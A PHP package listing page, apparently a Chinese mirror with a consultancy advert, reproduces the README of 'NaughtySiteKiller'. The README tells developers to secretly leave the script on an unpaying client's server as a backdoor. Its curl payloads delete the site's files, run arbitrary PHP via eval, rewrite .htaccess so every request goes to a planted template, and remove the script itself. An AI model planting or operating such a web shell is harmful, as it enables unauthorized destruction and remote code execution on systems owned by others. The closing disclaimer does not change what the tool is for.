peterujah/naughty-site-killer 问题修复 & 功能扩展

解决BUG、新增功能、兼容多环境部署,快速响应你的开发需求

邮箱:yvsm@zunyunkeji.com | QQ:316430983 | 微信:yvsm316

peterujah/naughty-site-killer

Composer 安装命令:

composer require peterujah/naughty-site-killer

包简介

NaughtySiteKiller provides a secure method for performing critical operations on a server via HTTP requests. It's designed to protect your work when dealing with naughty clients who, after gaining access to their cPanel, change their passwords and refuse to complete payment.

README 文档

README

We don't like peace, we want problems always.

Naughty Killer Class

Ah, the joy of building a website for a "naughty" client who refuses to pay after getting full access to their cPanel. Don't fret! Instead of chasing them down, just drop the NaughtySiteKiller class on their server as a failsafe. This class lets you send HTTP requests to perform some rather justifiable actions on their website—whether it's deleting files, creating fake templates, or obstructing their site's content. It's the digital equivalent of "you won't pay? Fine, enjoy your broken website.

Key Features:

  1. Authentication: Validates requests using Bearer or Basic token schemes.
  2. Token Generation: Generate tokens from a password for authentication purposes.
  3. Action Handling: Executes actions like kill (deletes files and self-destructs the script), template (creates template files and updates .htaccess) or execute (Execute a string as PHP code using eval function).
  4. Security: Ensures that requests are authenticated by comparing the hashed token value.

Installation via Composer:

composer require peterujah/naughty-site-killer

Usage Examples

Simply place the NaughtySiteKiller class on their server as an insurance measure. It supports token-based authentication and various actions like deleting files, creating templates, and updating .htaccess securely.

1. Generating a Hashed Token

To authenticate requests, generate a token by hashing a password using the sha256 algorithm. This token will be used for all incoming HTTP requests.

Example:

$password = 'super_secret_password';
$token = \PeterUjah\NaughtySiteKiller::generateToken($password);  // Returns: "Bearer <hashed-password>"

Alternatively, you can directly hash the password:

$password = 'super_secret_password';
echo hash('sha256', $password);  // Outputs the hashed token

2. Handling the Incoming Request

Place the NaughtySiteKiller handler on the public directory of the website where it can be accessed through HTTP requests. This handler will process incoming requests, validate the authorization token, check the requested action (kill, execute, template, kill-self), and execute the appropriate method.

Example Usage:

// path/to/public_html/naughty.php 
<?php
use \PeterUjah\NaughtySiteKiller;

// Run script without interruptions. 
NaughtySiteKiller::uninterrupted();

$naughty = new NaughtySiteKiller('<your-secure-bearer-hashed-token-here>');
try {
    // Optionally pass `__FILE__` if class and handler are not in the same file to also delete the handler file
    $naughty->run(__FILE__);  // Run the script based on incoming HTTP request
} catch (Exception $e) {
    $naughty->response("Unknown error occurred: {$e->getMessage()}", 500);  // Handle errors
}

Note: Replace <your-secure-bearer-hashed-token-here> with the hashed token you generated in the previous step.

Payload Fields

The following fields can be included in the payload when sending a request:

$request = [
    'action'      => 'kill', // Action to perform: 'kill', 'execute', 'template', or 'kill-self'.
    'content'     => 'Content for the template, execute (used in both HTML and PHP files when performing kill action, or for template creation).',
    'htmlContents'=> 'Content for the template.html file (used when performing kill action).', // HTML content for the template.
    'phpContents' => 'Content for the template.php file (used when performing kill action).', // PHP content for the template.
    'name'        => 'Filename to use when performing template action.', // Custom filename for the template.
    'htaccess'    => 'Content for the .htaccess file (overwrites existing .htaccess).',
];

Explanation of Fields:

  • action (string): Specifies which action to perform:

    • 'kill': Deletes files including self and creates index.php and index.html files (HTML and PHP).
    • 'execute': Execute a string as PHP code using eval function. The instructions should be placed in contents.
    • 'template': Creates template file <name>.php and modifies .htaccess to redirect all website request to <name>.php if no custom htaccess content is provided.
    • 'kill-self': self-destructing, delete the handler file only.
  • content (string): Content to include in the generated template files. Used for both HTML and PHP files during the kill action, or for the template action.

  • htmlContents (string): Content to be placed in the <template-name>.html file when performing the kill action.

  • phpContents (string): Content to be placed in the <template-name>.php file when performing the kill action.

  • name (string): The name of the template file to use when performing the template action. Default is __template.php if not specified.

  • htaccess (string): The content for the .htaccess file. This will overwrite any existing .htaccess file during the template action. If not provided it will use default to redirect requests to the <template-name>.php.

Payload Requests Examples

Here are examples of how to send payload requests using curl for the different actions (kill, template, and kill-self), including the Bearer token in the header.

1. Kill Action Request (Deletes all files and creates template files)

curl -X POST http://your-server-url/naughty.php \
     -H "Authorization: Bearer YOUR_BEARER_TOKEN" \
     -H "Content-Type: application/json" \
     -d '{
           "action": "kill",
           "phpContents": "<?php echo \"Hello, World!\"; ?>",
           "htmlContents": "<html><body><h1>Hello, World!</h1></body></html>"
        }'

2. Execute Action (Run custom code on the server—because we trust you)

The Execute Action allows you to send custom PHP code to be executed on the server. It's like a magic wand for your commands.

curl -X POST http://your-server-url/naughty.php \
     -H "Authorization: Bearer YOUR_BEARER_TOKEN" \
     -H "Content-Type: application/json" \
     -d '{
           "action": "execute",
           "contents": "return \"Hello, Naughty Client!\";"
        }'

Output:

This will execute the PHP code and you will receive the following response:

{
    "message": "Execution completed",
    "result": "Hello, Naughty Client!"
}

Explanation:

  • action: Set to "kill" to trigger the kill action.
  • phpContents: Content for the template.php file.
  • htmlContents: Content for the template.html file.

3. Template Action Request (Creates template files and updates .htaccess)

curl -X POST http://your-server-url/naughty.php \
     -H "Authorization: Bearer YOUR_BEARER_TOKEN" \
     -H "Content-Type: application/json" \
     -d '{
           "action": "template",
           "content": "<?php echo \"Welcome to the template!\"; ?>",
           "name": "custom_template.php",
           "htaccess": "RewriteEngine On\nRewriteRule ^.*$ custom_template.php [L,QSA]"
        }'

Explanation:

  • action: Set to "template" to create a template file and update .htaccess.
  • content: Content for the template (PHP code).
  • name: Custom name for the template file (custom_template.php).
  • htaccess: Custom .htaccess content to redirect all requests to the template.

4. Self-Key Action Request (Delete NaughtySiteKiller class and handler)

curl -X POST http://your-server-url/naughty.php \
     -H "Authorization: Bearer YOUR_BEARER_TOKEN" \
     -H "Content-Type: application/json" \
     -d '{
           "action": "kill-self"
        }'

Explanation:

  • action: Set to "kill-self", delete the handler file only.

Notes:

  • Authorization: Replace YOUR_BEARER_TOKEN with the actual Bearer token you are using for authentication.
  • Server URL: Replace http://your-server-url/naughty.php with the actual URL of your script.
  • Payload: The payload for each action is sent as JSON in the body of the request using the -d flag with curl.

Developer Responsibility:

The use of this class is solely the responsibility of the user/developer. The creator and contributors of this class disclaim any responsibility for abuse or damage caused by its misuse. Proper authentication, authorization, and input validation are mandatory to prevent unauthorized access and malicious usage. Any unauthorized use of this class is strictly prohibited and is the responsibility of the user.

peterujah/naughty-site-killer 适用场景与选型建议

peterujah/naughty-site-killer 是一款 基于 PHP 开发的 Composer 扩展包,目前已累计 1 次下载、GitHub Stars 达 1, 最近一次更新时间为 2025 年 01 月 04 日, 在 PHP 生态内属于活跃度较高的组件。

它主要适用于以下技术方向: 「php」 「naughty」 「naughty client」 「web killer」 「site killer」 等业务场景。在实际项目中,围绕这些方向常见需要落地的问题包括:接口对接、性能调优、并发安全、与既有框架(Laravel / ThinkPHP / Yii / Webman 等)的兼容适配,以及生产环境的日志埋点与稳定性保障。

我们在过去多个企业项目中使用过 peterujah/naughty-site-killer 或与其功能相近的方案,如果你在选型或落地过程中遇到问题,例如 版本兼容、二次改造、私有化封装、与内部系统对接、生产 BUG 排查,欢迎联系我们协助评估。

围绕 peterujah/naughty-site-killer 我们能提供哪些服务?
定制开发 / 二次开发

基于 peterujah/naughty-site-killer 在你已有业务上做功能扩展、字段裁剪、UI 适配、与内部账号 / 权限 / 日志系统的深度对接。

BUG 修复 & 性能优化

线上偶发问题、内存泄漏、慢查询、并发异常等排查修复;针对高流量场景做缓存、队列、索引层面的调优。

项目外包 & 长期维护

承接完整的项目从需求 → 设计 → 开发 → 上线 → 长期运维;也可按月提供技术保姆服务。

yvsm@zunyunkeji.com QQ:316430983 微信:yvsm316 西安尊云信息科技 · 专注 PHP / Go / 分布式系统研发

统计信息

  • 总下载量: 1
  • 月度下载量: 0
  • 日度下载量: 0
  • 收藏数: 1
  • 点击次数: 24
  • 依赖项目数: 0
  • 推荐数: 0

GitHub 信息

  • Stars: 1
  • Watchers: 1
  • Forks: 1
  • 开发语言: PHP

其他信息

  • 授权协议: MIT
  • 更新时间: 2025-01-04